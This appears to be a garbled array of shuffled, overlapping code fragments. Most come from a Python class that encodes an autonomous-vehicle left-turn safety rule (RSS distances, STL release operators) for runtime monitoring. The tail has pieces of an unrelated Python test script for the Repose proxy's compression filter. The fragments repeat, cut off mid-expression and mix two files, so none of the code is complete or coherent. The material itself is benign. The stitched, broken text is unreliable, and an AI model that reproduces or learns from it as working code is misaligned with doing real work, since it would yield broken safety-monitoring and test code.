non-strict release) - Def. Release:", "<= 0) OR (car_can_brake) Note: this condition takes into account 2 possible implementation", "steps (note: we use `next` operator, we need discrete-time stl) `max_steps`: overestimation of", "or {A_lon_e_maxacc})))\" P_brake = f\"(not(not({release_cond}) until[0:{self._p['rho_dt']}] not({release_cond} or {A_lon_e_minbr})))\" P_leftturn = f\"({P_react} and", "data[\"v_lon_ego\"] out_signals[\"d_lon_ej\"] = data[\"d_ego_j\"] out_signals[\"d_lon_cj\"] = data[\"d_car_j\"] out_signals[\"is_e_in_junc\"] = data[\"is_e_in_j\"] out_signals[\"d_lon_min_ej\"] = self._compute_dynamic_safe_long_dist_to_junction(data,", "R_I (phi_1 or phi_2) \"\"\" @property def variables(self): return [\"time\", \"d_lon_ej\", \"d_lon_cj\", \"d_lon_min_ej\",", "= plan_react AND plan_brake plan_react = (release_condition) R^ns_{0:rho} (a_lon(ego) <= a_lon_maxacc) plan_brake =", "# check output assert all([s in out_signals for s in self.variables]), f\"missing out", "+ self._p['rho'] * self._p['a_lon_maxacc']) ** 2) d_b_brake_den = 2 * self._p['a_lon_minbr'] d_b_brake =", "{} out_signals[\"time\"] = data[\"time\"] out_signals[\"a_lon_e\"] = data[\"a_lon_e\"] out_signals[\"v_lon_e\"] = data[\"v_lon_e\"] out_signals[\"d_lon_ej\"] = data[\"d_lon_ej\"]", "resulting specification phi_lt_resp = f\"(next (not {S})) -> (next {P_leftturn})\" return phi_lt_resp def", "time to brake\" proper response = \"ego brakes until reach zero-velocity or other", "- Def. Release: phi_1 R_I phi_2 = not(not(phi_1) Until_i not(phi_2)) - Def. Non-Strict", "\"ego is approaching but not occupying the junction j, other car has no", "takes into account 2 possible implementation of the distance metric (only-positive or pos-neg)", "out signals ({self.variables} not in {out_signals.keys()})\" return out_signals def generate_signals(self, data: Dict[str, np.ndarray])", "[...] 
Nor must a road user who is obliged to give way substantially", "data[\"time\"] out_signals[\"a_lon_e\"] = data[\"a_lon_e\"] out_signals[\"v_lon_e\"] = data[\"v_lon_e\"] out_signals[\"d_lon_ej\"] = data[\"d_lon_ej\"] out_signals[\"d_lon_cj\"] = data[\"d_lon_cj\"]", "way when the latter turns into the other road.>> Intuition behind formalization: premise", "for s in self.variables]), f\"missing out signals ({self.variables} not in {out_signals.keys()})\" return out_signals", "(phi_1 or phi_2) \"\"\" @property def variables(self): return [\"time\", \"d_lon_ej\", \"d_lon_cj\", \"d_lon_min_ej\", \"d_lon_min_cj\",", "Intuition behind formalization: premise = \"ego is approaching but not occupying the junction", "from input signals out_signals = {} out_signals[\"elapsed_time\"] = data[\"elapsed_time\"] - data[\"elapsed_time\"][0] out_signals[\"time\"] =", "note: the only change is the assumption that v_front = 0, because a", "* self._p['a_lon_maxacc']) ** 2) d_b_brake_den = 2 * self._p['a_lon_minbr'] d_b_brake = d_b_brake_num /", "(not {S})) -> (next {P_leftturn})\" return phi_lt_resp def _compute_dynamic_safe_long_dist_to_junction(self, data: Dict[str, np.ndarray], v_field:", "and not(next({E_canbrake}))) and (not({C_canbrake})) and ({E_not_injunc}))\" P_react = f\"(not(not({release_cond}) until[0:{self._p['rho_dt']}] not({release_cond} or {A_lon_e_maxacc})))\"", "spec language (e.g. non-strict release) - Def. 
Release: phi_1 R_I phi_2 = not(not(phi_1)", "the distance metric (only-positive or pos-neg) If pos-neg, when car crosses junction, d(car,j)<0", "rss_params: static parameters for rss monitoring `a_lon_minbr`, `a_lon_maxbr` : min, max longitudinal acceleration", "for rss monitoring `a_lon_minbr`, `a_lon_maxbr` : min, max longitudinal acceleration when breaking `a_lon_minacc`,", "* self._p['a_lon_maxacc'] * self._p['rho'] ** 2 d_b_brake_num = ((data[v_field] + self._p['rho'] * self._p['a_lon_maxacc'])", "brake\" proper response = \"ego brakes until reach zero-velocity or other car crossed", "{A_lon_e_maxacc})))\" P_brake = f\"(not(not({release_cond}) until[0:{self._p['rho_dt']}] not({release_cond} or {A_lon_e_minbr})))\" P_leftturn = f\"({P_react} and {P_brake})\"", "\"sim_dt\", \"max_steps\"] assert all([p in rss_params for p in required_parameters]) self._p = {p:", "written using not and until S = f\"(({E_canbrake} and not(next({E_canbrake}))) and (not({C_canbrake})) and", "d_b_brake = d_b_brake_num / d_b_brake_den d_diff = d_b_prebr + d_b_brake d_lon_min = np.maximum(d_diff,", "or (d_lon_cj<0))\" # the check on d_lon_cj in case d has pos-neg interpret.", "typing import Dict, List import numpy as np from stl_rules.stl_rule import STLRule class", "who is obliged to give way substantially impede a road user who has", "non-strict release) - Def. 
Release: phi_1 R_I phi_2 = not(not(phi_1) Until_i not(phi_2)) -", "Non-Strict Release: phi_1 R^ns_I phi_2 = phi_1 R_I (phi_1 or phi_2) \"\"\" @property", "f\"(next (not {S})) -> (next {P_leftturn})\" return phi_lt_resp def _compute_dynamic_safe_long_dist_to_junction(self, data: Dict[str, np.ndarray],", "= data[\"is_e_in_junc\"] out_signals[\"d_lon_min_ej\"] = self._compute_dynamic_safe_long_dist_to_junction(data, v_field=\"v_lon_e\") out_signals[\"d_lon_min_cj\"] = self._compute_dynamic_safe_long_dist_to_junction(data, v_field=\"v_lon_c\") out_signals = {k:", "when car crosses junction, d(car,j)<0 and then release_condition is true (the ego can", "not in {data.keys()})\" # generate output signals from input signals out_signals = {}", "has the right of way when the latter turns into the other road.>>", "stl) `max_steps`: overestimation of the episode length, used to monitor open intervals \"\"\"", "p in required_parameters]) self._p = {p: rss_params[p] for p in required_parameters} @property def", "{P_leftturn})\" return phi_lt_resp def _compute_dynamic_safe_long_dist_to_junction(self, data: Dict[str, np.ndarray], v_field: str) -> np.ndarray: #", "\"d_lon_min_ej\", \"d_lon_min_cj\", \"is_e_in_junc\", \"v_lon_e\", \"a_lon_e\"] @property def types(self): return [\"int\", \"float\", \"float\", \"float\",", "{k: list(v) for k, v in out_signals.items()} # check output assert all([s in", "(car_can_brake) AND (is_in_junction(ego, j)<=0) ego_can_brake = dist(ego,j) > d_lon_safe(ego,j) car_can_brake = dist(car,j) >", "in out_signals for s in self.variables]), f\"missing out signals ({self.variables} not in {out_signals.keys()})\"", "the intersection\" Formalization in STL: premise = (ego_can_brake AND NOT(next(ego_can_brake))) AND (car_can_brake) AND", "= [\"elapsed_time\", \"v_lon_ego\", \"v_lon_car\", \"a_lon_ego\", \"d_ego_j\", \"is_e_in_j\", \"d_car_j\"] assert all([s in data for", "in data for s in obs_signals]), f\"missing in signals ({obs_signals} not in 
{data.keys()})\"", "in {data.keys()})\" # generate output signals from input signals out_signals = {} out_signals[\"time\"]", "required_parameters} @property def spec(self): # predicates E_canbrake = \"(d_lon_ej > d_lon_min_ej)\" C_canbrake =", "{A_lon_e_minbr})))\" P_leftturn = f\"({P_react} and {P_brake})\" # resulting specification phi_lt_resp = f\"(next (not", "proceed if they can see that they will neither endanger nor substantially impede", "all([p in rss_params for p in required_parameters]) self._p = {p: rss_params[p] for p", "true *Rewriting*: some operators have been rewritten to match the rtamt spec language", "way substantially impede a road user who has the right of way when", "open intervals \"\"\" required_parameters = [\"a_lon_minbr\", \"a_lon_maxacc\", \"rho\", \"rho_dt\", \"sim_dt\", \"max_steps\"] assert all([p", "generate_signals_for_demo(self, data: Dict[str, np.ndarray], begin:int=5, end:int=1000) -> Dict[str, List]: # check input obs_signals", "plan = plan_react AND plan_brake plan_react = (release_condition) R^ns_{0:rho} (a_lon(ego) <= a_lon_maxacc) plan_brake", "\"v_lon_e\", \"v_lon_c\", \"d_lon_ej\", \"d_lon_cj\", \"is_e_in_junc\"] assert all([s in data for s in obs_signals]),", "j, other car has no time to brake\" proper response = \"ego brakes", "`max_steps`: overestimation of the episode length, used to monitor open intervals \"\"\" required_parameters", "obs_signals = [\"elapsed_time\", \"v_lon_ego\", \"v_lon_car\", \"a_lon_ego\", \"d_ego_j\", \"is_e_in_j\", \"d_car_j\"] assert all([s in data", "out_signals[\"d_lon_ej\"] = data[\"d_lon_ej\"] out_signals[\"d_lon_cj\"] = data[\"d_lon_cj\"] out_signals[\"is_e_in_junc\"] = data[\"is_e_in_junc\"] out_signals[\"d_lon_min_ej\"] = self._compute_dynamic_safe_long_dist_to_junction(data, v_field=\"v_lon_e\")", "If only-pos, when car crosses junction, d(car,j)=inf, then car_can_brake and release_condition is true", "return [\"time\", \"d_lon_ej\", \"d_lon_cj\", \"d_lon_min_ej\", \"d_lon_min_cj\", 
\"is_e_in_junc\", \"v_lon_e\", \"a_lon_e\"] @property def types(self): return", "def _compute_dynamic_safe_long_dist_to_junction(self, data: Dict[str, np.ndarray], v_field: str) -> np.ndarray: # note: the only", "@property def types(self): return [\"int\", \"float\", \"float\", \"float\", \"float\", \"float\", \"float\", \"float\"] def", "d_diff = d_b_prebr + d_b_brake d_lon_min = np.maximum(d_diff, np.zeros_like(d_diff)) return d_lon_min def generate_signals_for_demo(self,", "out_signals[\"elapsed_time\"] = data[\"elapsed_time\"] - data[\"elapsed_time\"][0] out_signals[\"time\"] = np.floor((data[\"elapsed_time\"] - data[\"elapsed_time\"][0]) / self._p[\"sim_dt\"]).astype(int) out_signals[\"a_lon_e\"]", "of the distance metric (only-positive or pos-neg) If pos-neg, when car crosses junction,", "out_signals.items()} # check output assert all([s in out_signals for s in self.variables]), f\"missing", "possible implementation of the distance metric (only-positive or pos-neg) If pos-neg, when car", "they will neither endanger nor substantially impede a road user who has the", "\"(is_e_in_junc <= 0)\" V_lon_e_stop = \"(v_lon_e <= 0)\" C_react_or_crossed = f\"({C_canbrake} or (d_lon_cj<0))\"", "`a_lon_minbr`, `a_lon_maxbr` : min, max longitudinal acceleration when breaking `a_lon_minacc`, `a_lon_maxacc` : min,", "{S}))) -> (next {P_leftturn}))\" return phi_lt_resp @property def demo_spec(self): # predicates E_canbrake =", "# check input obs_signals = [\"elapsed_time\", \"v_lon_ego\", \"v_lon_car\", \"a_lon_ego\", \"d_ego_j\", \"is_e_in_j\", \"d_car_j\"] assert", "will neither endanger nor substantially impede a road user who has the right", "non-strict release operator is written using not and until S = f\"(({E_canbrake} and", "+ d_b_brake d_lon_min = np.maximum(d_diff, np.zeros_like(d_diff)) return d_lon_min def generate_signals_for_demo(self, data: Dict[str, np.ndarray],", "endanger nor substantially impede a road user who has the right of way.", "= f\"(({E_canbrake} 
and not(next({E_canbrake}))) and (not({C_canbrake})) and ({E_not_injunc}))\" P_react = f\"(not(not({release_cond}) until[0:{self._p['rho_dt']}] not({release_cond}", "remove the `d_f_brake` term from the calculation d_b_prebr = data[v_field] * self._p['rho'] +", "\"\"\" :param rss_params: static parameters for rss monitoring `a_lon_minbr`, `a_lon_maxbr` : min, max" ]
[ "import __version__ @click.group() def cli_version(): pass @cli_version.command('version') def main(): \"\"\" Print the version.", "def main(): \"\"\" Print the version. \"\"\" Version().run() class Version: def run(self): print(f\"", "from guniflask_cli import __version__ @click.group() def cli_version(): pass @cli_version.command('version') def main(): \"\"\" Print", "click from guniflask_cli import __version__ @click.group() def cli_version(): pass @cli_version.command('version') def main(): \"\"\"", "guniflask_cli import __version__ @click.group() def cli_version(): pass @cli_version.command('version') def main(): \"\"\" Print the", "main(): \"\"\" Print the version. \"\"\" Version().run() class Version: def run(self): print(f\" guniflask-cli:", "@click.group() def cli_version(): pass @cli_version.command('version') def main(): \"\"\" Print the version. \"\"\" Version().run()", "version. \"\"\" Version().run() class Version: def run(self): print(f\" guniflask-cli: v{__version__}\") import guniflask print(f\"", "@cli_version.command('version') def main(): \"\"\" Print the version. \"\"\" Version().run() class Version: def run(self):", "Version().run() class Version: def run(self): print(f\" guniflask-cli: v{__version__}\") import guniflask print(f\" guniflask: v{guniflask.__version__}\")", "\"\"\" Print the version. \"\"\" Version().run() class Version: def run(self): print(f\" guniflask-cli: v{__version__}\")", "cli_version(): pass @cli_version.command('version') def main(): \"\"\" Print the version. \"\"\" Version().run() class Version:", "__version__ @click.group() def cli_version(): pass @cli_version.command('version') def main(): \"\"\" Print the version. \"\"\"", "def cli_version(): pass @cli_version.command('version') def main(): \"\"\" Print the version. \"\"\" Version().run() class", "Print the version. 
\"\"\" Version().run() class Version: def run(self): print(f\" guniflask-cli: v{__version__}\") import", "import click from guniflask_cli import __version__ @click.group() def cli_version(): pass @cli_version.command('version') def main():", "the version. \"\"\" Version().run() class Version: def run(self): print(f\" guniflask-cli: v{__version__}\") import guniflask", "pass @cli_version.command('version') def main(): \"\"\" Print the version. \"\"\" Version().run() class Version: def", "\"\"\" Version().run() class Version: def run(self): print(f\" guniflask-cli: v{__version__}\") import guniflask print(f\" guniflask:" ]
[ "copy model returns the identity, # this is its own class so we", "torch # the copy model returns the identity, # this is its own", "to change the code to use the copymodel class CopyEnvModel(torch.nn.Module): def __init__(self): super(CopyEnvModel,", "change the code to use the copymodel class CopyEnvModel(torch.nn.Module): def __init__(self): super(CopyEnvModel, self).__init__()", "is its own class so we dont have to change the code to", "use the copymodel class CopyEnvModel(torch.nn.Module): def __init__(self): super(CopyEnvModel, self).__init__() def forward(self, input_frame, input_action):", "dont have to change the code to use the copymodel class CopyEnvModel(torch.nn.Module): def", "class CopyEnvModel(torch.nn.Module): def __init__(self): super(CopyEnvModel, self).__init__() def forward(self, input_frame, input_action): return input_frame, torch.zeros(input_frame.shape[0]).cuda()", "have to change the code to use the copymodel class CopyEnvModel(torch.nn.Module): def __init__(self):", "code to use the copymodel class CopyEnvModel(torch.nn.Module): def __init__(self): super(CopyEnvModel, self).__init__() def forward(self,", "own class so we dont have to change the code to use the", "we dont have to change the code to use the copymodel class CopyEnvModel(torch.nn.Module):", "the code to use the copymodel class CopyEnvModel(torch.nn.Module): def __init__(self): super(CopyEnvModel, self).__init__() def", "this is its own class so we dont have to change the code", "copymodel class CopyEnvModel(torch.nn.Module): def __init__(self): super(CopyEnvModel, self).__init__() def forward(self, input_frame, input_action): return input_frame,", "to use the copymodel class CopyEnvModel(torch.nn.Module): def __init__(self): super(CopyEnvModel, self).__init__() def forward(self, input_frame,", "import torch # the copy model returns the identity, # this is its", "so we dont have to change the code to use the copymodel class", "the identity, # this is its own class so we dont 
have to", "its own class so we dont have to change the code to use", "identity, # this is its own class so we dont have to change", "# this is its own class so we dont have to change the", "the copy model returns the identity, # this is its own class so", "class so we dont have to change the code to use the copymodel", "model returns the identity, # this is its own class so we dont", "the copymodel class CopyEnvModel(torch.nn.Module): def __init__(self): super(CopyEnvModel, self).__init__() def forward(self, input_frame, input_action): return", "returns the identity, # this is its own class so we dont have", "# the copy model returns the identity, # this is its own class" ]
[]
[ "import logging import time from datetime import timedelta from typing import List import", "games.models import Game MAX_RETRY_DURATION: timedelta = timedelta(hours=3) RETRY_DURATIONS: List[timedelta] = [ timedelta(seconds=10), timedelta(seconds=30),", "not fetch report %s', game) if retry_duration == MAX_RETRY_DURATION: raise ex LOGGER.debug('Now wating", "Game): for retry_duration in RETRY_DURATIONS: try: return requests.get(game.report_source_url(), stream=True) except requests.exceptions.ConnectionError as ex:", "import List import requests from games.models import Game MAX_RETRY_DURATION: timedelta = timedelta(hours=3) RETRY_DURATIONS:", "Game MAX_RETRY_DURATION: timedelta = timedelta(hours=3) RETRY_DURATIONS: List[timedelta] = [ timedelta(seconds=10), timedelta(seconds=30), timedelta(minutes=1), timedelta(minutes=5),", "MAX_RETRY_DURATION: timedelta = timedelta(hours=3) RETRY_DURATIONS: List[timedelta] = [ timedelta(seconds=10), timedelta(seconds=30), timedelta(minutes=1), timedelta(minutes=5), timedelta(minutes=30),", "LOGGER.warning('Could not fetch report %s', game) if retry_duration == MAX_RETRY_DURATION: raise ex LOGGER.debug('Now", "import Game MAX_RETRY_DURATION: timedelta = timedelta(hours=3) RETRY_DURATIONS: List[timedelta] = [ timedelta(seconds=10), timedelta(seconds=30), timedelta(minutes=1),", "RETRY_DURATIONS: try: return requests.get(game.report_source_url(), stream=True) except requests.exceptions.ConnectionError as ex: LOGGER.warning('Could not fetch report", "time from datetime import timedelta from typing import List import requests from games.models", "timedelta(seconds=10), timedelta(seconds=30), timedelta(minutes=1), timedelta(minutes=5), timedelta(minutes=30), timedelta(hours=1), MAX_RETRY_DURATION ] LOGGER = logging.getLogger('hbscorez') def fetch_report(game:", "MAX_RETRY_DURATION ] LOGGER = logging.getLogger('hbscorez') def fetch_report(game: Game): for retry_duration in RETRY_DURATIONS: try:", "timedelta(minutes=30), 
timedelta(hours=1), MAX_RETRY_DURATION ] LOGGER = logging.getLogger('hbscorez') def fetch_report(game: Game): for retry_duration in", "] LOGGER = logging.getLogger('hbscorez') def fetch_report(game: Game): for retry_duration in RETRY_DURATIONS: try: return", "requests from games.models import Game MAX_RETRY_DURATION: timedelta = timedelta(hours=3) RETRY_DURATIONS: List[timedelta] = [", "import timedelta from typing import List import requests from games.models import Game MAX_RETRY_DURATION:", "logging.getLogger('hbscorez') def fetch_report(game: Game): for retry_duration in RETRY_DURATIONS: try: return requests.get(game.report_source_url(), stream=True) except", "%s', game) if retry_duration == MAX_RETRY_DURATION: raise ex LOGGER.debug('Now wating for %s', retry_duration)", "try: return requests.get(game.report_source_url(), stream=True) except requests.exceptions.ConnectionError as ex: LOGGER.warning('Could not fetch report %s',", "= timedelta(hours=3) RETRY_DURATIONS: List[timedelta] = [ timedelta(seconds=10), timedelta(seconds=30), timedelta(minutes=1), timedelta(minutes=5), timedelta(minutes=30), timedelta(hours=1), MAX_RETRY_DURATION", "in RETRY_DURATIONS: try: return requests.get(game.report_source_url(), stream=True) except requests.exceptions.ConnectionError as ex: LOGGER.warning('Could not fetch", "RETRY_DURATIONS: List[timedelta] = [ timedelta(seconds=10), timedelta(seconds=30), timedelta(minutes=1), timedelta(minutes=5), timedelta(minutes=30), timedelta(hours=1), MAX_RETRY_DURATION ] LOGGER", "return requests.get(game.report_source_url(), stream=True) except requests.exceptions.ConnectionError as ex: LOGGER.warning('Could not fetch report %s', game)", "List[timedelta] = [ timedelta(seconds=10), timedelta(seconds=30), timedelta(minutes=1), timedelta(minutes=5), timedelta(minutes=30), timedelta(hours=1), MAX_RETRY_DURATION ] LOGGER =", "timedelta(seconds=30), timedelta(minutes=1), timedelta(minutes=5), timedelta(minutes=30), timedelta(hours=1), 
MAX_RETRY_DURATION ] LOGGER = logging.getLogger('hbscorez') def fetch_report(game: Game):", "timedelta = timedelta(hours=3) RETRY_DURATIONS: List[timedelta] = [ timedelta(seconds=10), timedelta(seconds=30), timedelta(minutes=1), timedelta(minutes=5), timedelta(minutes=30), timedelta(hours=1),", "from games.models import Game MAX_RETRY_DURATION: timedelta = timedelta(hours=3) RETRY_DURATIONS: List[timedelta] = [ timedelta(seconds=10),", "timedelta(minutes=1), timedelta(minutes=5), timedelta(minutes=30), timedelta(hours=1), MAX_RETRY_DURATION ] LOGGER = logging.getLogger('hbscorez') def fetch_report(game: Game): for", "timedelta(hours=1), MAX_RETRY_DURATION ] LOGGER = logging.getLogger('hbscorez') def fetch_report(game: Game): for retry_duration in RETRY_DURATIONS:", "timedelta(minutes=5), timedelta(minutes=30), timedelta(hours=1), MAX_RETRY_DURATION ] LOGGER = logging.getLogger('hbscorez') def fetch_report(game: Game): for retry_duration", "= [ timedelta(seconds=10), timedelta(seconds=30), timedelta(minutes=1), timedelta(minutes=5), timedelta(minutes=30), timedelta(hours=1), MAX_RETRY_DURATION ] LOGGER = logging.getLogger('hbscorez')", "fetch report %s', game) if retry_duration == MAX_RETRY_DURATION: raise ex LOGGER.debug('Now wating for", "retry_duration in RETRY_DURATIONS: try: return requests.get(game.report_source_url(), stream=True) except requests.exceptions.ConnectionError as ex: LOGGER.warning('Could not", "List import requests from games.models import Game MAX_RETRY_DURATION: timedelta = timedelta(hours=3) RETRY_DURATIONS: List[timedelta]", "requests.get(game.report_source_url(), stream=True) except requests.exceptions.ConnectionError as ex: LOGGER.warning('Could not fetch report %s', game) if", "= logging.getLogger('hbscorez') def fetch_report(game: Game): for retry_duration in RETRY_DURATIONS: try: return requests.get(game.report_source_url(), stream=True)", "from typing import List import requests from games.models import Game MAX_RETRY_DURATION: 
timedelta =", "LOGGER = logging.getLogger('hbscorez') def fetch_report(game: Game): for retry_duration in RETRY_DURATIONS: try: return requests.get(game.report_source_url(),", "import requests from games.models import Game MAX_RETRY_DURATION: timedelta = timedelta(hours=3) RETRY_DURATIONS: List[timedelta] =", "stream=True) except requests.exceptions.ConnectionError as ex: LOGGER.warning('Could not fetch report %s', game) if retry_duration", "fetch_report(game: Game): for retry_duration in RETRY_DURATIONS: try: return requests.get(game.report_source_url(), stream=True) except requests.exceptions.ConnectionError as", "requests.exceptions.ConnectionError as ex: LOGGER.warning('Could not fetch report %s', game) if retry_duration == MAX_RETRY_DURATION:", "def fetch_report(game: Game): for retry_duration in RETRY_DURATIONS: try: return requests.get(game.report_source_url(), stream=True) except requests.exceptions.ConnectionError", "datetime import timedelta from typing import List import requests from games.models import Game", "from datetime import timedelta from typing import List import requests from games.models import", "as ex: LOGGER.warning('Could not fetch report %s', game) if retry_duration == MAX_RETRY_DURATION: raise", "[ timedelta(seconds=10), timedelta(seconds=30), timedelta(minutes=1), timedelta(minutes=5), timedelta(minutes=30), timedelta(hours=1), MAX_RETRY_DURATION ] LOGGER = logging.getLogger('hbscorez') def", "timedelta(hours=3) RETRY_DURATIONS: List[timedelta] = [ timedelta(seconds=10), timedelta(seconds=30), timedelta(minutes=1), timedelta(minutes=5), timedelta(minutes=30), timedelta(hours=1), MAX_RETRY_DURATION ]", "<filename>src/players/management/commands/fetch_report.py import logging import time from datetime import timedelta from typing import List", "ex: LOGGER.warning('Could not fetch report %s', game) if retry_duration == MAX_RETRY_DURATION: raise ex", "logging import time from datetime import timedelta from typing import List import 
requests", "except requests.exceptions.ConnectionError as ex: LOGGER.warning('Could not fetch report %s', game) if retry_duration ==", "import time from datetime import timedelta from typing import List import requests from", "report %s', game) if retry_duration == MAX_RETRY_DURATION: raise ex LOGGER.debug('Now wating for %s',", "game) if retry_duration == MAX_RETRY_DURATION: raise ex LOGGER.debug('Now wating for %s', retry_duration) time.sleep(retry_duration.total_seconds())", "timedelta from typing import List import requests from games.models import Game MAX_RETRY_DURATION: timedelta", "for retry_duration in RETRY_DURATIONS: try: return requests.get(game.report_source_url(), stream=True) except requests.exceptions.ConnectionError as ex: LOGGER.warning('Could", "typing import List import requests from games.models import Game MAX_RETRY_DURATION: timedelta = timedelta(hours=3)" ]
[ ".quotes import quotes, random_titles, search, quotes_and_authors from .qotd import quote_of_the_day from . import", "quotes, random_titles, search, quotes_and_authors from .qotd import quote_of_the_day from . import langs def", "from .quotes import quotes, random_titles, search, quotes_and_authors from .qotd import quote_of_the_day from .", "import quotes, random_titles, search, quotes_and_authors from .qotd import quote_of_the_day from . import langs", "quotes_and_authors from .qotd import quote_of_the_day from . import langs def supported_languages(): l =", "random_titles, search, quotes_and_authors from .qotd import quote_of_the_day from . import langs def supported_languages():", "from .qotd import quote_of_the_day from . import langs def supported_languages(): l = langs.SUPPORTED_LANGUAGES[:]", "import quote_of_the_day from . import langs def supported_languages(): l = langs.SUPPORTED_LANGUAGES[:] l.sort() return", "quote_of_the_day from . import langs def supported_languages(): l = langs.SUPPORTED_LANGUAGES[:] l.sort() return l", ".qotd import quote_of_the_day from . import langs def supported_languages(): l = langs.SUPPORTED_LANGUAGES[:] l.sort()", "search, quotes_and_authors from .qotd import quote_of_the_day from . import langs def supported_languages(): l" ]
[ "self.valve is not None: self.valve.stop() if self.deproxy is not None: self.deproxy.shutdown_all_endpoints() available_test_cases =", "def apply_config_set(config_set_name, params=None): if params is None: params = {} conf.process_config_set(config_set_name, verbose=config_verbose, destination_path=config_dir,", "log to STDERR.\", action='store_true') parser.add_argument('--test-case', action='append', help=\"Which test case to run. Can be", "%(levelname)s:%(name)s:' '%(funcName)s:' '%(filename)s(%(lineno)d):' '%(threadName)s(%(thread)d):%(message)s')) global config_verbose config_verbose = True if args.test_case is None:", "self.deproxy is not None: self.deproxy.shutdown_all_endpoints() available_test_cases = [ TestCompression ] def run(): test_case_map", "load_tests = loader.loadTestsFromTestCase for test_case in test_cases: suite.addTest(load_tests(test_case)) testRunner = _xmlrunner.XMLTestRunner(output='test-reports') result =", "setUpModule() suite = unittest.TestSuite() loader = unittest.TestLoader() load_tests = loader.loadTestsFromTestCase for test_case in", "unittest.TestSuite() loader = unittest.TestLoader() load_tests = loader.loadTestsFromTestCase for test_case in test_cases: suite.addTest(load_tests(test_case)) testRunner", "_xmlrunner import logging import time import argparse import os import deproxy logger =", "is not None: self.deproxy.shutdown_all_endpoints() available_test_cases = [ TestCompression ] def run(): test_case_map =", "Set up folder hierarchy logger.debug('setUpModule') pathutil.create_folder(config_dir) pathutil.create_folder(deployment_dir) pathutil.create_folder(os.path.dirname(log_file)) config_verbose = False def apply_config_set(config_set_name,", "if args.print_log: logging.basicConfig(level=logging.DEBUG, format=('%(asctime)s %(levelname)s:%(name)s:' '%(funcName)s:' '%(filename)s(%(lineno)d):' '%(threadName)s(%(thread)d):%(message)s')) global config_verbose config_verbose = True", "not in test_cases_set: 
test_cases_set.add(tc) test_cases.append(test_case_map[tc]) logger.debug('run') setUpModule() suite = unittest.TestSuite() loader = unittest.TestLoader()", "test_case_map[tc_class.__name__] = tc_class parser = argparse.ArgumentParser() parser.add_argument('--print-log', help=\"Print the log to STDERR.\", action='store_true')", "logger.debug('setUp') self.deproxy = deproxy.Deproxy() self.end_point = self.deproxy.add_endpoint(('localhost', deproxy_port)) pathutil.clear_folder(config_dir) params = { 'port':", "= pathutil.join(os.getcwd(), 'etc/repose') deployment_dir = pathutil.join(os.getcwd(), 'var/repose') artifact_dir = pathutil.join(os.getcwd(), 'usr/share/repose/filters') log_file =", "= {} startup_wait_time = 15 def setUpModule(): # Set up folder hierarchy logger.debug('setUpModule')", "'all' is the default, and runs all \" \"available test cases\", choices=['all'] +", "set() for tc in args.test_case: if tc == 'all': test_cases = available_test_cases break", "= repose.ReposeValve(config_dir=config_dir, stop_port=stop_port) time.sleep(startup_wait_time) def test_compression_with_gzip(self): logger.debug('test_compression_with_gzip') url = 'http://localhost:%i/' % repose_port logger.debug('url", "import conf from narwhal import pathutil import xmlrunner as _xmlrunner import logging import", "args.test_case is None: args.test_case = ['all'] test_cases = [] test_cases_set = set() for", "for test_case in test_cases: suite.addTest(load_tests(test_case)) testRunner = _xmlrunner.XMLTestRunner(output='test-reports') result = testRunner.run(suite) if __name__", "is None: params = {} conf.process_config_set(config_set_name, verbose=config_verbose, destination_path=config_dir, params=params) class TestCompression(unittest.TestCase): def setUp(self):", "import repose import unittest from narwhal import conf from narwhal import pathutil import", "self.valve.stop() if self.deproxy is not None: self.deproxy.shutdown_all_endpoints() available_test_cases = [ TestCompression ] 
def", "specififed \" \"multiple times. 'all' is the default, and runs all \" \"available", "= tc_class parser = argparse.ArgumentParser() parser.add_argument('--print-log', help=\"Print the log to STDERR.\", action='store_true') parser.add_argument('--test-case',", "break if tc not in test_cases_set: test_cases_set.add(tc) test_cases.append(test_case_map[tc]) logger.debug('run') setUpModule() suite = unittest.TestSuite()", "test_cases_set: test_cases_set.add(tc) test_cases.append(test_case_map[tc]) logger.debug('run') setUpModule() suite = unittest.TestSuite() loader = unittest.TestLoader() load_tests =", "== 'all': test_cases = available_test_cases break if tc not in test_cases_set: test_cases_set.add(tc) test_cases.append(test_case_map[tc])", "loader.loadTestsFromTestCase for test_case in test_cases: suite.addTest(load_tests(test_case)) testRunner = _xmlrunner.XMLTestRunner(output='test-reports') result = testRunner.run(suite) if", "logger.debug('setUpModule') pathutil.create_folder(config_dir) pathutil.create_folder(deployment_dir) pathutil.create_folder(os.path.dirname(log_file)) config_verbose = False def apply_config_set(config_set_name, params=None): if params is", "deproxy logger = logging.getLogger(__name__) config_dir = pathutil.join(os.getcwd(), 'etc/repose') deployment_dir = pathutil.join(os.getcwd(), 'var/repose') artifact_dir", "{} startup_wait_time = 15 def setUpModule(): # Set up folder hierarchy logger.debug('setUpModule') pathutil.create_folder(config_dir)", "% repose_port logger.debug('url = %s' % url) time.sleep(1) mc = self.deproxy.make_request(method='GET', url=url, headers=headers)", "unittest.TestLoader() load_tests = loader.loadTestsFromTestCase for test_case in test_cases: suite.addTest(load_tests(test_case)) testRunner = _xmlrunner.XMLTestRunner(output='test-reports') result", "to STDERR.\", action='store_true') parser.add_argument('--test-case', action='append', help=\"Which test case to run. 
Can be specififed", "= {} conf.process_config_set(config_set_name, verbose=config_verbose, destination_path=config_dir, params=params) class TestCompression(unittest.TestCase): def setUp(self): logger.debug('setUp') self.deproxy =", "#!/usr/bin/env python from narwhal import repose import unittest from narwhal import conf from", "# Set up folder hierarchy logger.debug('setUpModule') pathutil.create_folder(config_dir) pathutil.create_folder(deployment_dir) pathutil.create_folder(os.path.dirname(log_file)) config_verbose = False def", "import xmlrunner as _xmlrunner import logging import time import argparse import os import", "args = parser.parse_args() if args.print_log: logging.basicConfig(level=logging.DEBUG, format=('%(asctime)s %(levelname)s:%(name)s:' '%(funcName)s:' '%(filename)s(%(lineno)d):' '%(threadName)s(%(thread)d):%(message)s')) global config_verbose", "TestCompression(unittest.TestCase): def setUp(self): logger.debug('setUp') self.deproxy = deproxy.Deproxy() self.end_point = self.deproxy.add_endpoint(('localhost', deproxy_port)) pathutil.clear_folder(config_dir) params", "narwhal import conf from narwhal import pathutil import xmlrunner as _xmlrunner import logging", "if params is None: params = {} conf.process_config_set(config_set_name, verbose=config_verbose, destination_path=config_dir, params=params) class TestCompression(unittest.TestCase):", "tc_class in available_test_cases: test_case_map[tc_class.__name__] = tc_class parser = argparse.ArgumentParser() parser.add_argument('--print-log', help=\"Print the log", "artifact_dir = pathutil.join(os.getcwd(), 'usr/share/repose/filters') log_file = pathutil.join(os.getcwd(), 'var/log/repose/current.log') repose_port = 8888 stop_port =", "hierarchy logger.debug('setUpModule') 